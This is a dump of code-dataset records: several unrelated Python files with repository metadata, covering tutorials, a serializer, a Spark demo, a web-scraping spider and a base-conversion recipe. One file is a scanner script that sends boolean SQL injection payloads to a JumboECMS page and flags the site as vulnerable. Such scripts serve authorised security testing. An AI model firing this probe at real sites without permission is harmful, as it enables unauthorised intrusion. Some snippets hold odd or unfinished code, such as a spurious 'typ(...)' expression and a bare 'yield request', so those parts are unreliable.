blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5f4574f19704732b35e9a1608f3760eaacfdcd64 | bd93fa910151c278be8249055bc084e5a5c35a6a | /Python/itcast/01-Python进阶1/3面向对象/02魔法方法str.py | 87b7cb966fb02fd2b8c31c726aea63b56963dabb | []
| no_license | ahojcn/practice-code | bd81595b80239cd2550183093566bd536a83ed3f | b65f4e76271479269463e92fd3fd41585c2ac792 | refs/heads/master | 2021-07-10T14:15:08.036592 | 2020-07-09T11:32:16 | 2020-07-09T11:32:16 | 153,059,349 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | """
__str__ 相当于 Java 中的 toString()
"""
class Cat:
    """Simple pet model demonstrating the __str__ magic method
    (the Python counterpart of Java's toString())."""

    def __init__(self, name, age, sex):
        # Single leading underscore marks the attributes as non-public.
        self._name = name
        self._age = age
        self._sex = sex

    def __str__(self):
        # Same concatenated text as before, built with an f-string.
        return f"姓名:{self._name}年龄:{self._age}性别:{self._sex}"

    def eat(self):
        print(f"{self._name}吃鱼...")

    def drink(self):
        print(f"{self._name}喝可乐...")

    def info(self):
        print(f"name:{self._name}, age:{self._age}, sex:{self._sex}")
# Demo: build two cats and print them (print() uses Cat.__str__).
tom_cat = Cat("汤姆", 20, "男")
lanmao_cat = Cat("蓝猫", 10, "女")
print(tom_cat)
print(" 分界线 ".center(50, "*"))
print(lanmao_cat)
| [
"[email protected]"
]
| |
e81a46145ac0da82da2536133a7c0a69c8ffc392 | 7c82896f5322ffd5d61697ed597f4d2c53e4e744 | /backend/ecommernce_25667/wsgi.py | 16d515f35532223e7e77c29bf39f2a5ff06566df | []
| no_license | crowdbotics-apps/ecommernce-25667 | c4487f6c19a3d4dc608fd2a13291f74c84b53dc7 | 55dd1c6293fcfbec01aec7e8e0118ed8b1c48130 | refs/heads/master | 2023-04-02T00:48:51.026549 | 2021-04-13T19:40:25 | 2021-04-13T19:40:25 | 357,668,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | """
WSGI config for ecommernce_25667 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before the application object is
# built; setdefault keeps any value already present in the environment.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommernce_25667.settings")
# Module-level WSGI callable imported by servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"[email protected]"
]
| |
539f8f2da156d8b3ce8a755659f688fe6ee1d71e | a1119965e2e3bdc40126fd92f4b4b8ee7016dfca | /branches/nacl_repy/seattlelib/serialize.repy | 29a142d7996092ac9787ccb13497c54fdc3571d5 | [
"MIT"
]
| permissive | SeattleTestbed/attic | 0e33211ddf39efdbcf5573d4fc7fa5201aa7310d | f618a962ce2fd3c4838564e8c62c10924f5df45f | refs/heads/master | 2021-06-10T23:10:47.792847 | 2017-05-15T12:05:43 | 2017-05-15T12:05:43 | 20,154,061 | 0 | 1 | null | 2014-10-16T17:21:06 | 2014-05-25T12:34:00 | Python | UTF-8 | Python | false | false | 6,493 | repy | """
Author: Justin Cappos
Start date: October 9th, 2009
Purpose: A simple library that serializes and deserializes built-in repy types.
This includes strings, integers, floats, booleans, None, complex, tuples,
lists, sets, frozensets, and dictionaries.
There are no plans for including objects.
Note: that all items are treated as separate references. This means things
like 'a = []; a.append(a)' will result in an infinite loop. If you have
'b = []; c = (b,b)' then 'c[0] is c[1]' is True. After deserialization
'c[0] is c[1]' is False.
I can add support or detection of this if desired.
"""
# The basic idea is simple. Say the type (a character) followed by the
# type specific data. This is adequate for simple types
# that do not contain other types. Types that contain other types, have
# a length indicator and then the underlying items listed sequentially.
# For a dict, this is key1value1key2value2.
def serializedata(data):
    """
    <Purpose>
      Convert a data item of any type into a string such that we can
      deserialize it later.

    <Arguments>
      data: the thing to seriailize.  Can be of essentially any type except
            objects.

    <Exceptions>
      TypeError if the type of 'data' isn't allowed

    <Side Effects>
      None.

    <Returns>
      A string suitable for deserialization.
    """
    # Wire format: a one-character type tag followed by a type-specific
    # payload.  Container types frame each element as "<len>:<payload>" and
    # terminate with the sentinel "0:".
    # this is essentially one huge case statement...

    # None
    if type(data) == type(None):
        return 'N'
    # Boolean
    elif type(data) == type(True):
        if data == True:
            return 'BT'
        else:
            return 'BF'
    # Integer / Long
    # NOTE(review): `long` exists only on Python 2 -- this module targets the
    # Repy (Python 2) runtime; on Python 3 this test would raise NameError
    # for non-int data.
    elif type(data) is int or type(data) is long:
        datastr = str(data)
        return 'I'+datastr
    # Float
    elif type(data) is float:
        datastr = str(data)
        return 'F'+datastr
    # Complex
    elif type(data) is complex:
        datastr = str(data)
        # str(complex) may wrap the value in parentheses; strip them so the
        # payload can be fed straight back to complex() when deserializing.
        if datastr[0] == '(' and datastr[-1] == ')':
            datastr = datastr[1:-1]
        return 'C'+datastr
    # String
    elif type(data) is str:
        return 'S'+data
    # List or tuple or set or frozenset
    elif type(data) is list or type(data) is tuple or type(data) is set or type(data) is frozenset:
        # the only impact is the first letter...
        if type(data) is list:
            mystr = 'L'
        elif type(data) is tuple:
            mystr = 'T'
        elif type(data) is set:
            mystr = 's'
        elif type(data) is frozenset:
            mystr = 'f'
        else:
            raise Exception("InternalError: not a known type after checking")

        # Serialize each element recursively, framed with its length.
        for item in data:
            thisitem = serializedata(item)
            # Append the length of the item, plus ':', plus the item.  1 -> '2:I1'
            mystr = mystr + str(len(thisitem))+":"+thisitem

        # Zero-length frame acts as the end-of-container sentinel.
        mystr = mystr + '0:'
        return mystr
    # dict
    elif typ(data) is dict if False else (type(data) is dict):
        # Keys and values are stored as two parallel lists: the keys list is
        # length-framed, the values list simply follows it.
        mystr = 'D'
        keysstr = serializedata(data.keys())
        # Append the length of the list, plus ':', plus the list.
        mystr = mystr + str(len(keysstr))+":"+keysstr
        # just plop the values on the end.
        valuestr = serializedata(data.values())
        mystr = mystr + valuestr
        return mystr
    # Unknown!!!
    else:
        raise TypeError("Unknown type '"+str(type(data))+"' for data :"+str(data))
def deserializedata(datastr):
    """
    <Purpose>
      Convert a serialized data string back into its original types.

    <Arguments>
      datastr: the string to deseriailize.

    <Exceptions>
      ValueError if the string is corrupted
      TypeError if the type of 'data' isn't allowed

    <Side Effects>
      None.

    <Returns>
      Items of the original type
    """
    if type(datastr) != str:
        raise TypeError("Cannot deserialize non-string of type '"+str(type(datastr))+"'")

    # The first character is the type tag written by serializedata().
    typeindicator = datastr[0]
    restofstring = datastr[1:]

    # this is essentially one huge case statement...

    # None
    if typeindicator == 'N':
        if restofstring != '':
            raise ValueError("Malformed None string '"+restofstring+"'")
        return None
    # Boolean
    elif typeindicator == 'B':
        if restofstring == 'T':
            return True
        elif restofstring == 'F':
            return False
        raise ValueError("Malformed Boolean string '"+restofstring+"'")
    # Integer / Long
    elif typeindicator == 'I':
        try:
            return int(restofstring)
        except ValueError:
            raise ValueError("Malformed Integer string '"+restofstring+"'")
    # Float
    elif typeindicator == 'F':
        try:
            return float(restofstring)
        except ValueError:
            raise ValueError("Malformed Float string '"+restofstring+"'")
    # Complex
    elif typeindicator == 'C':
        try:
            return complex(restofstring)
        except ValueError:
            raise ValueError("Malformed Complex string '"+restofstring+"'")
    # String
    elif typeindicator == 'S':
        return restofstring
    # List / Tuple / set / frozenset / dict
    elif typeindicator == 'L' or typeindicator == 'T' or typeindicator == 's' or typeindicator == 'f':
        # We'll split this and keep adding items to the list.  At the end,
        # we'll convert it to the right type
        thislist = []
        data = restofstring
        # We'll use '0:' as our 'end separator'
        while data != '0:':
            # Each element is framed as "<length>:<payload>".
            lengthstr, restofdata = data.split(':', 1)
            length = int(lengthstr)

            # get this item, convert to a string, append to the list.
            thisitemdata = restofdata[:length]
            thisitem = deserializedata(thisitemdata)
            thislist.append(thisitem)

            # Now toss away the part we parsed.
            data = restofdata[length:]

        if typeindicator == 'L':
            return thislist
        elif typeindicator == 'T':
            return tuple(thislist)
        elif typeindicator == 's':
            return set(thislist)
        elif typeindicator == 'f':
            return frozenset(thislist)
        else:
            raise Exception("InternalError: not a known type after checking")
    # dict: a length-framed keys list followed immediately by the values list
    elif typeindicator == 'D':
        lengthstr, restofdata = restofstring.split(':', 1)
        length = int(lengthstr)
        # get this item, convert to a string, append to the list.
        keysdata = restofdata[:length]
        keys = deserializedata(keysdata)

        # The rest should be the values list.
        values = deserializedata(restofdata[length:])
        # Keys and values must be parallel lists of equal length.
        if type(keys) != list or type(values) != list or len(keys) != len(values):
            raise ValueError("Malformed Dict string '"+restofstring+"'")

        thisdict = {}
        # NOTE(review): xrange is Python 2 only (this module targets Repy).
        for position in xrange(len(keys)):
            thisdict[keys[position]] = values[position]
        return thisdict
    # Unknown!!!
    else:
        raise ValueError("Unknown typeindicator '"+str(typeindicator)+"' for data :"+str(restofstring))
| [
"USER@DOMAIN"
]
| USER@DOMAIN |
80475aeee17df3cba099d4d162c7d768068d604d | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /cms/jumboecms/jumboecms_slide_id_sqli.py | 2b692758481ff7bb88275db2b44434dd22f770e3 | []
| no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: JumboECMS V1.6.1 注入漏洞
referer: http://www.wooyun.org/bugs/wooyun-2010-062717
author: Lucifer
description: 文件/plus/slide.aspx参数id存在SQL注入。
'''
import sys
import requests
import warnings
from termcolor import cprint
class jumboecms_slide_id_sqli_BaseVerify:
    """Boolean-based SQL injection probe for JumboECMS /plus/slide.aspx?id=."""

    def __init__(self, url):
        # Base URL of the target site (no trailing path).
        self.url = url

    def run(self):
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Two payloads: an always-true and an always-false boolean condition.
        probe_base = self.url + "/plus/slide.aspx?id=1%20AnD%201="
        trueurl = probe_base + "1"
        falseurl = probe_base + "2"
        try:
            true_resp = requests.get(trueurl, headers=request_headers, timeout=10, verify=False)
            false_resp = requests.get(falseurl, headers=request_headers, timeout=10, verify=False)
            # Injectable when only the false condition produces an error page.
            vulnerable = ("Stack trace" not in true_resp.text
                          and "Stack trace" in false_resp.text)
            if vulnerable:
                cprint("[+]存在JumboECMS V1.6.1 注入漏洞...(高危)\tpayload: "+falseurl, "red")
            else:
                cprint("[-]不存在jumboecms_slide_id_sqli漏洞", "white", "on_grey")
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
    # Silence the InsecureRequestWarning noise caused by verify=False.
    warnings.filterwarnings("ignore")
    # Target base URL is taken from the first CLI argument.
    testVuln = jumboecms_slide_id_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
"[email protected]"
]
| |
fff42786877735c43c12c0b6b7b613c376845e8c | 6375b7e4dfe11ced7dcd3fad1a7a2de9a504910d | /exc7_more_print.py | 9a734f30db2a725ccfb434e3859ea93eda66107f | []
| no_license | yaowenqiang/lpthw | b65e6b8ce576e7caa5cfba5570550e546d1e0549 | 4bbd7ebb4e8c570a39bf9c55df9bd97e4f86e1e5 | refs/heads/master | 2020-04-01T10:57:32.959389 | 2019-05-01T09:27:25 | 2019-05-01T09:27:25 | 153,140,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | print("Mary had a little lamb.")
print("Its fleece was white as {}.".format("snow"))
print("And everywhere that Mary went.")
print("." * 10)
end1 = "c"
end2 = "h"
end3 = "e"
end4 = "e"
end5 = "s"
end6 = "e"
end7 = "b"
end8 = "u"
end9 = "r"
end10 = "g"
end11 = "e"
end12 = "r"
print(end1 + end2 + end3 + end4 + end5 + end6, end=" ")
print(end7 + end8 + end9 + end10 + end11 + end12)
| [
"[email protected]"
]
| |
c0bca8d865bf372c3ad7e16a347e11b50c5bd363 | 6a7058009587e78b5c758ff783410325ad7c2a4b | /leet/trees/serializeDeserialize.py | 11901325add1a326d48e38679f57ee4d830890e5 | [
"Apache-2.0"
]
| permissive | stacykutyepov/python-cp-cheatsheet | 8b96b76403c501f5579befd07b3c4a4c69fe914e | a00a57e1b36433648d1cace331e15ff276cef189 | refs/heads/master | 2023-07-16T13:26:35.130763 | 2021-08-30T11:23:39 | 2021-08-30T11:23:39 | 401,442,535 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:

    def serialize(self, root):
        """Encodes a tree to a single string.

        :type root: TreeNode
        :rtype: str
        """
        # Preorder walk; '#' marks an absent child so the shape is unambiguous.
        tokens = []

        def walk(node):
            if node is None:
                tokens.append('#')
                return
            tokens.append(str(node.val))
            walk(node.left)
            walk(node.right)

        walk(root)
        return ' '.join(tokens)

    def deserialize(self, data):
        """Decodes your encoded data to tree.

        :type data: str
        :rtype: TreeNode
        """
        # Consume tokens in the same preorder the serializer produced them.
        tokens = iter(data.split())

        def build():
            token = next(tokens)
            if token == '#':
                return None
            node = TreeNode(int(token))
            node.left = build()
            node.right = build()
            return node

        return build()
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
# NOTE(review): leftover debug output pasted into the file -- these bare list
# literals are evaluated and discarded at import time (no effect).
['1', '3', '5', '#', '6', '#', '#', '2', '#', '4', '#', '#']
['1', '3', '5', '#', '6', '#', '#', '2', '#', '4', '#', '#']
| [
"[email protected]"
]
| |
ae112f60c472608d64fea6061820870ce341dd5c | 048df2b4dc5ad153a36afad33831017800b9b9c7 | /atcoder/arc030/arc030_2.py | fb80908cb169ecdb2886d69d72282652698d8452 | []
| no_license | fluffyowl/past-submissions | a73e8f5157c647634668c200cd977f4428c6ac7d | 24706da1f79e5595b2f9f2583c736135ea055eb7 | refs/heads/master | 2022-02-21T06:32:43.156817 | 2019-09-16T00:17:50 | 2019-09-16T00:17:50 | 71,639,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | def reduce_graph(root, children, houseki):
def rec_dfs(node):
removals = []
for c in children[node]:
if not rec_dfs(c):
removals.append(c)
for i in removals[::-1]:
children[node].remove(i)
if len(children[node]) == 0 and houseki[node] == 0:
return False
else:
return True
rec_dfs(root)
return children
def solve():
    # Python 2 solution (raw_input / print statement): count the steps needed
    # to visit every jewel-bearing node of a tree starting from `root`.
    n, root = map(int, raw_input().split())
    root -= 1  # convert to 0-based index
    rinsetsu = [[] for i in range(n)]  # adjacency list
    houseki = map(int, raw_input().split())  # jewel flag per node
    for i in range(n-1):
        x, y = map(lambda x:int(x)-1, raw_input().split())
        rinsetsu[x].append(y)
        rinsetsu[y].append(x)

    # Root the tree at `root` with an iterative DFS, recording child lists.
    children = [[] for i in range(n)]
    stack = [(root, None)]
    while len(stack) != 0:
        node, parent = stack.pop()
        for child in rinsetsu[node]:
            if child != parent:
                children[node].append(child)
                stack.append((child, node))

    # Drop jewel-free subtrees; each remaining edge is traversed twice
    # (down and back up), so the answer is 2 * (number of kept edges).
    children = reduce_graph(root, children, houseki)
    s = 0
    for i in range(n):
        s += len(children[i]) * 2
    print s

solve()
| [
"[email protected]"
]
| |
71724e17def474442e5c246dd126c278d482fb73 | 74482894c61156c13902044b4d39917df8ed9551 | /test/test_get_contract_details_by_address_response_item.py | 924e6c10948054f2f336b69dea39bc685b9e522f | [
"MIT"
]
| permissive | xan187/Crypto_APIs_2.0_SDK_Python | bb8898556ba014cc7a4dd31b10e24bec23b74a19 | a56c75df54ef037b39be1315ed6e54de35bed55b | refs/heads/main | 2023-06-22T15:45:08.273635 | 2021-07-21T03:41:05 | 2021-07-21T03:41:05 | 387,982,780 | 1 | 0 | NOASSERTION | 2021-07-21T03:35:29 | 2021-07-21T03:35:29 | null | UTF-8 | Python | false | false | 1,353 | py | """
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import cryptoapis
from cryptoapis.model.get_contract_details_by_address_response_item import GetContractDetailsByAddressResponseItem
class TestGetContractDetailsByAddressResponseItem(unittest.TestCase):
    """GetContractDetailsByAddressResponseItem unit test stubs
    (auto-generated by OpenAPI Generator; still to be filled in)."""

    def setUp(self):
        # No shared fixtures needed for this generated stub.
        pass

    def tearDown(self):
        pass

    def testGetContractDetailsByAddressResponseItem(self):
        """Test GetContractDetailsByAddressResponseItem"""
        # FIXME: construct object with mandatory attributes with example values
        # model = GetContractDetailsByAddressResponseItem()  # noqa: E501
        pass

if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
]
| |
3a48961a4b6dd2e091a6c553297caabc8dfe0bf9 | 8501165bbbc6acf017b062c846a3ef7ef8624dc0 | /dataframes.py | 5e95c158a85cf9e26deb466f6ef7e8a54bd9025e | []
| no_license | olavosamp/spark_tutorial | df9edcc3cf82fc2103dd4f889e13eec22f97fbcc | c80d0e8259eda0dc443c3af259a3b11241ba63fa | refs/heads/master | 2023-03-29T09:20:08.279790 | 2021-03-26T20:01:40 | 2021-03-26T20:01:40 | 351,897,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | from pyspark.sql import SparkSession
from pyspark.sql.types import StructType, StructField, StringType, IntegerType
spark = SparkSession.builder.master("local[1]").appName("SparkbyExamples.com").getOrCreate()
data = [
("George", "M", 12),
("Adolf","M", 14),
("Emilia","F", 16),
]
print("\nOriginal RDD")
rdd = spark.sparkContext.parallelize(data)
print(rdd)
print("RDD Count ", rdd.count())
print("\nDataFrame from RDD")
df_rdd = rdd.toDF()
df_rdd.show()
print("\nDataFrame from list")
columns = ["Name", "Sex", "Age"]
df_list = spark.createDataFrame(data=data, schema=columns)
df_list.show()
print(df_list.head())
print("\nDataFrame with Schema")
schema = StructType([
StructField("Name", StringType(), False),
StructField("Sex", StringType(), True),
StructField("Age", IntegerType(), True),
])
df_schema = spark.createDataFrame(data=data, schema=schema)
df_schema.printSchema()
df_schema.show(truncate=False)
exit()
print("\nDataFrame from csv")
df_csv = spark.read.csv("test.csv", header=True)
df_csv.printSchema()
df_csv.show()
df_csv.createOrReplaceTempView("PERSON_DATA")
df_sql = spark.sql("SELECT * FROM PERSON_DATA")
df_sql.show()
df_groupby = spark.sql("SELECT Sex, COUNT(*) FROM PERSON_DATA GROUP BY Sex")
df_groupby.show() | [
"[email protected]"
]
| |
ef0aaacd8fedf13c8a18d46944b7df0927c88d38 | e905abd9bb7bd7017657d0a0c4d724d16e37044c | /.history/article/spiders/ieee_20210206223025.py | 4220b80e3f61daeddb62f3b9b60b2bc1a791ce13 | []
| no_license | tabdelbari/articles | a8b921841f84fb473f5ed1cdcda743863e6bc246 | f0e1dfdc9e818e43095933139b6379a232647898 | refs/heads/main | 2023-03-05T10:21:35.565767 | 2021-02-10T13:35:14 | 2021-02-10T13:35:14 | 325,654,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,534 | py | import scrapy
import logging
import re
from scrapy_splash import SplashRequest, request
from article.items import ArticleItem
import json
class IeeeSpider(scrapy.Spider):
    """Spider that queries the IEEE Xplore REST search API through Splash.

    NOTE(review): this is an editor-history snapshot; `parse` appears to be a
    half-rewritten duplicate of `parse_1` (see comments inline).
    """

    name = 'ieee'
    allowed_domains = ['ieee.org']

    # Lua executed by Splash: forward method/body/headers to the target,
    # wait for the page to settle, then return the rendered HTML.
    lua_script = """
    function main(splash, args)
        assert(splash:go{
            splash.args.url,
            headers=splash.args.headers,
            http_method=splash.args.http_method,
            body=splash.args.body,
        })
        assert(splash:wait(10))
        return splash:html()
    end
    """

    def __init__(self, topic='', keywords='', **kwargs):
        super().__init__(**kwargs)
        # self.start_urls = ['https://ieeexplore.ieee.org/search/searchresult.jsp?newsearch=true&queryText=%s' %keywords]
        self.post_url = 'https://ieeexplore.ieee.org/rest/search'
        # Headers required by the IEEE REST endpoint (JSON in/out).
        self.headers = {
            'Origin': 'https://ieeexplore.ieee.org',
            'Host': 'ieeexplore.ieee.org',
            'Accept-Language': 'fr-MA,fr;q=0.9,en-US;q=0.8,en;q=0.7,ar-MA;q=0.6,ar;q=0.5,fr-FR;q=0.4',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        }
        self.topic = topic
        self.keywords = keywords
        self.totalPages = 0  # filled in by init_articles from the first reply

    def start_requests(self):
        # First POST only discovers how many result pages exist.
        post_data = '{"queryText": "' + self.topic + \
            '", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"]}'
        yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
                            magic_response=True, meta={'handle_httpstatus_all': True, 'data': 'hello'},
                            args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})

    def init_articles(self, response):
        # response.meta['data'] -> "hello"
        # Splash returns the JSON body wrapped in a <pre> element.
        jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
        self.totalPages = jr['totalPages']
        # Fan out one request per result page.
        for i in range(1, (self.totalPages+1)):
            post_data = '{"queryText": "' + self.topic + \
                '", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"], "pageNumber": '+str(i)+'}'
            yield SplashRequest(self.post_url, self.parse_1, endpoint='execute',
                                magic_response=True, meta={'handle_httpstatus_all': True, 'data': i},
                                args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})

    def parse_1(self, response):
        logging.info('##################################Processing:' + str(response.meta['data']))
        jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
        for record in jr['records']:
            result = {
                'title': record['articleTitle'],
                'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
                'country': '',
                'abstract': record['abstract'],
                'date_pub': record['publicationDate'],
                'journal': record['publicationTitle'],
                'topic': self.topic
            }
            # search for country
            # BUGFIX: 'body' was the bare name `null` (a NameError in Python);
            # a GET request carries no body, so pass None.
            # NOTE(review): the callback self.init_articles looks wrong for a
            # country lookup -- confirm against the finished revision.
            yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
                                magic_response=True, meta={'handle_httpstatus_all': True, 'data': result},
                                args={'lua_source': self.lua_script, 'http_method': 'GET', 'body': None, 'headers': self.headers})
            # find abstract for this article and pass as meta the half of object: record['articleNumber']

    def parse(self, response):
        jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
        for record in jr['records']:
            result = {
                'title': record['articleTitle'],
                'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
                'country': '',
                'abstract': record['abstract'],
                'date_pub': record['publicationDate'],
                'journal': record['publicationTitle'],
                'topic': self.topic,
                'latitude': '',
                'longitude': ''
            }
            # search for country
            # NOTE(review): `request` here is the scrapy_splash.request module
            # imported at the top of the file, not a Request object -- this
            # method is unfinished; yielding it would not produce a crawl.
            yield request
            # find abstract for this article and pass as meta the half of object: record['articleNumber']
| [
"[email protected]"
]
| |
7d81e0e0ff8208f3ac7143677298a42c4f2a1199 | 481b4b6955c6ddb5d962da5f2c8f9bf6d49d4f4c | /virtual/bin/pip | 63518a7dfa1e3b162a75c4bfdd69ccb87c3d5ea8 | []
| no_license | sanii-muthui/motoblog | b0b72c2013741a8a0dcb93ebc96cbce2edd220a6 | d82ae26184b75a433aaeefcd77c0bbe174bfe27f | refs/heads/master | 2022-10-03T08:55:29.879056 | 2019-08-13T07:02:07 | 2019-08-13T07:02:07 | 202,012,043 | 0 | 0 | null | 2022-09-16T18:08:10 | 2019-08-12T21:30:57 | Python | UTF-8 | Python | false | false | 246 | #!/home/sanii/Desktop/motoblog/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
3cd9bfc221cf246f3a393362774ee3f9883a9923 | 288a00d2ab34cba6c389b8c2444455aee55a8a95 | /tests/data23/recipe-496895.py | 705c281fd7ebdc79fa6b70e2cc5c4d5bbf46119c | [
"BSD-2-Clause"
]
| permissive | JohannesBuchner/pystrict3 | ffd77b7bbc378bd4d8f21b5c6bd69a0d64a52ddb | 18b0dd369082422f9bf0f89c72e7acb53a49849c | refs/heads/master | 2023-08-14T06:37:37.954880 | 2023-07-13T11:16:38 | 2023-07-13T11:16:38 | 268,571,175 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,143 | py | import string
def rebase(i, frombase=None, tobase=None, fromalphabet=None, toalphabet=None, resize=1, too_big=40000, debug=False):
''' if frombase is not specified, it is guessed from the type and/or char in i with highest ord.
tobase defaults to [10, 2][frombase == 10].
the alphabets are map(chr, range(256)) if its base is between 62 and 255;
otherwise, string.digits+string.letters.
always returns a string which is also valid input.
valid bases are ints in range(-256, 257).
alphabets must be subscriptable, and can only contain str's.
invalid tobases are replied with 'why?'; rebase('why?') == '217648673'.
returned string is zfilled to the next largest multiple of resize
'''
if frombase == None:
if isinstance(i, int):
frombase = 10
elif isinstance(i, str):
a = str(i)
if any([(chr(x) in a) for x in list(range(ord('0'))) + list(range(58, 65)) + list(range(91, 97)) + list(range(123, 256))]):
frombase = max(list(map(ord, a))) + 1
else:
frombase = max(list(map((string.digits + string.letters).index, a))) + 1
if tobase == None:
tobase = [10, 2][frombase == 10]
# got bases, ensuring that everything is an int
tobase = int(tobase)
frombase = int(frombase)
abstobase = abs(tobase)
absfrombase = abs(frombase)
if absfrombase in [0, 1]:
i = len(str(i))
elif 2 <= frombase <= 36:
# may be difficult to translate to C
i = int(str(i), frombase)
else:
i = str(i)
n = 0
if fromalphabet == None:
if 62 <= absfrombase <= 256:
fromalphabet = list(map(chr, list(range(256))))
else:
fromalphabet = string.digits + string.letters
fromalphabet = fromalphabet[:absfrombase]
for j in range(len(i)):
n += (frombase ** j) * fromalphabet.index(i[-1-j])
i = n
# got ints, converting to tobase
if debug: print('converting %d from base %d to %d' % (i, frombase, tobase))
if abstobase in [0, 1]:
return '0' * ((i > 0) and int(i) or 0)
elif abstobase > 256:
return 'why?'
# if execution gets here, we might want the result to be zfilled to a multiple of resize
r = ''
if tobase == 10:
r = str(i)
else:
if i < 0:
print('negative', end=' ')
i = -i
if toalphabet is None:
if 62 <= abstobase <= 256:
toalphabet = list(map(chr, list(range(abstobase))))
else:
toalphabet = (string.digits + string.letters)[:abstobase]
if tobase < 0:
i = -i
j = 0
while i != 0:
r = toalphabet[i % tobase] + r
i /= tobase
j += 1
if j >= too_big: raise "call again; set too_big bigger"
if resize > 1:
if 62 <= abstobase <= 256:
r = toalphabet[0] * (resize - (len(r) % resize)) + r
else:
r = r.zfill(len(r) + resize - (len(r) % resize))
return r
| [
"[email protected]"
]
| |
e54a39dbfad7a724eeeaa1ef31bddec82f0bd60a | b5ca0a2ce47fdb4306bbdffcb995eb7e6eac1b23 | /Problem Solving/Algorithms/Strings/Strong Password/Strong_Password.py | ffab59cbf509d72ada08350dae73075e23cc95ca | []
| no_license | rsoemardja/HackerRank | ac257a66c3649534197b223b8ab55011d84fb9e1 | 97d28d648a85a16fbe6a5d6ae72ff6503a063ffc | refs/heads/master | 2022-04-14T22:46:03.412359 | 2020-04-03T07:44:04 | 2020-04-03T07:44:04 | 217,687,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the minimumNumber function below.
def minimumNumber(n, password):
    """Return the minimum number of characters to add to make `password` strong.

    A strong password has length >= 6 and contains at least one digit, one
    lowercase letter, one uppercase letter and one special character.
    """
    # One addition is needed for every character class that is absent.
    checks = (
        str.isdigit,
        str.islower,
        str.isupper,
